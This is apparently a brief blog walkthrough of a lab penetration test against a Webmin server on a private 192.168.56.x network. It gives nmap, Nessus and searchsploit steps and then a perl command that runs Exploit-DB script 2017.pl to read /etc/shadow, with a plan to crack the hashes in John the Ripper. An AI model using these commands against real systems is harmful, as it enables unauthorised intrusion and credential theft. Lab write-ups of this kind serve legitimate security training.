1. scan with nmap to see probe open ports
#nmap -sV 192.168.56.0/24
using port 10000.
192.168.56.102:100000
based on the picture, we know that they use webmin application.
3. open nessus to see the what application they use and see the vulnerabilities
based on the picture, we know that they using webmin application version 1.290 or lower.
4. search the vulnerabilities in exploit DB
#cd /pentest/exploits/exploitdb
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
5. type this to see how to use it.
root@bt:/pentest/exploits/exploitdb# cat platforms/multiple/remote/2017.pl
6. type this to see the username and password
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.56.102 10000 /etc/shadow 0
but the password still encrypted.
to crack the password i will use john the ripper.
No comments:
Post a Comment